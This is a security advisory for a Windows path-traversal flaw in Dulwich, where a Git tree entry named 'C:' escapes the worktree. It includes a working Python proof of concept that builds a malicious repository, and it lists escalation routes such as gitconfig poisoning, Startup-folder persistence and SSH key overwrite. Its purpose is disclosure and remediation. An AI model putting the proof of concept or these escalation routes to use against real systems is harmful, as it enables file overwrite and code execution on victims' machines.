GHSA-8mcx-5rqc-vhmf: Path Traversal

Published Oct 2, 2026
·
Updated

Affected files dulwich/index.py (Methods: validatepathelementntfs, treetofspath) dulwich/porcelain/init.py (Method: checkedworktreepath)

Description / Summary A High-severity Path Traversal vulnerability exists in Dulwich's checkout logic when running on Windows. The functions responsible for validating NTFS paths strictly reject .git variants, Alternate Data Streams (ADS), git~1 short names, and reserved device names, but they completely fail to check for DOS drive letter prefixes.

A malicious Git tree can contain an entry named C:. When Dulwich processes this tree on a Windows client, the string passes the validatepathelementntfs check. Later, treetofspath passes this path to os.path.join(root, b"C:\\\\Users\\\\...").

On Windows, if the second argument to os.path.join contains an absolute drive letter, the root path is completely discarded. As a result, Dulwich writes the repository file to the absolute path outside of the intended Git worktree.

While the standard C git client explicitly blocks this via hasdosdriveprefix() in path.c, Dulwich lacks this protection. Because Git trees are cross-platform, an attacker can author a malicious repository on Linux and wait for a Windows victim (or CI runner) to clone it.

Potential impact

This vulnerability allows an attacker to achieve Arbitrary File Write, which can trivially be escalated to Remote Code Execution (RCE) or total system compromise on the victim's Windows machine.

Attack vectors include: 1. Git Config Poisoning (RCE): Writing a malicious C:\\Users\\<victim>\\.gitconfig file to set core.sshCommand to an arbitrary executable, granting RCE the next time the user interacts with Git. 2. Persistence (RCE): Dropping a malicious executable into C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\. 3. SSH Key Overwrite: Writing to C:\\Users\\<victim>\\.ssh\\authorizedkeys to compromise remote servers accessible by the victim. 4. CI/CD Compromise: If a Windows-based CI/CD runner (e.g., GitHub Actions) automatically clones a malicious pull request, the runner is instantly compromised, potentially leaking repository secrets.

Proof of Concept (PoC) The following Python script (runnable on Linux) generates a malicious Git repository containing a payload that targets Windows clients.

python from dulwich.objects import Blob, Tree, Commit from dulwich.repo import Repo import os, tempfile

repopath = tempfile.mkdtemp() repo = Repo.init(repopath)

1. Build the payload blob. blob = Blob(); blob.data = b"pwned-by-drive-letter\\n" repo.objectstore.addobject(blob)

2. Build the malicious tree hierarchy: C:/Users/victim/evil.txt eviltxt = Tree(); eviltxt[b"evil.txt"] = (0o100644, blob.id) repo.objectstore.addobject(eviltxt) victimdir = Tree(); victimdir[b"victim"] = (0o040000, eviltxt.id) repo.objectstore.addobject(victimdir) usersdir = Tree(); usersdir[b"Users"] = (0o040000, victimdir.id) repo.objectstore.addobject(usersdir)

VULNERABILITY: The "C:" directory bypasses validation cdrive = Tree(); cdrive[b"C:"] = (0o040000, usersdir.id) repo.objectstore.addobject(cdrive)

commit = Commit() commit.tree = cdrive.id commit.message = b"add feature" commit.author = commit.committer = b"attacker <a@evil.example>" commit.authortime = commit.committime = 1700000000 commit.authortimezone = commit.committertimezone = 0 repo.objectstore.addobject(commit) repo.refs[b"refs/heads/main"] = commit.id

print(f"Malicious repo created at {repopath}") print(f"Clone with: dulwich clone {repopath} /target/win/worktree") Result: A Windows checkout of this commit writes the payload directly to C:\\Users\\victim\\evil.txt

Affected Software

1 affected componentFixes available
pip/dulwich<1.2.9
1.2.9

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade pip/dulwich to a version that resolves this vulnerability.

    Fixed in 1.2.9

Event History

Oct 2, 2026
Advisory Published
via GitHub·07:14 PM
Data Sourced
via GitHub·07:14 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

Which environments are exposed to this issue?

The vulnerable checkout behavior is described for Dulwich running on Windows. Repositories are cross-platform, so a malicious tree created elsewhere can affect a Windows client when it is checked out with Dulwich.

2

What does an attacker need to exploit it?

An attacker needs to provide a Git tree containing a path element with a DOS drive-letter prefix, such as C:. When Dulwich checks out that tree on Windows, the drive-prefixed path can cause the intended worktree root to be discarded.

3

Is a special Dulwich or Windows configuration required?

No special configuration requirement is identified in the advisory. The issue is in Dulwich's Windows NTFS path validation and checkout path construction.

4

How can I assess whether a repository is suspicious?

Inspect Git tree entries that will be checked out for names using DOS drive-letter prefixes. Such entries can pass the affected validation logic and resolve to locations outside the configured worktree on Windows.

5

What should be done to remediate the issue?

Update Dulwich to the release associated with the published fix, dulwich-1.2.9. Until updated, avoid checking out untrusted repositories with Dulwich on Windows.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203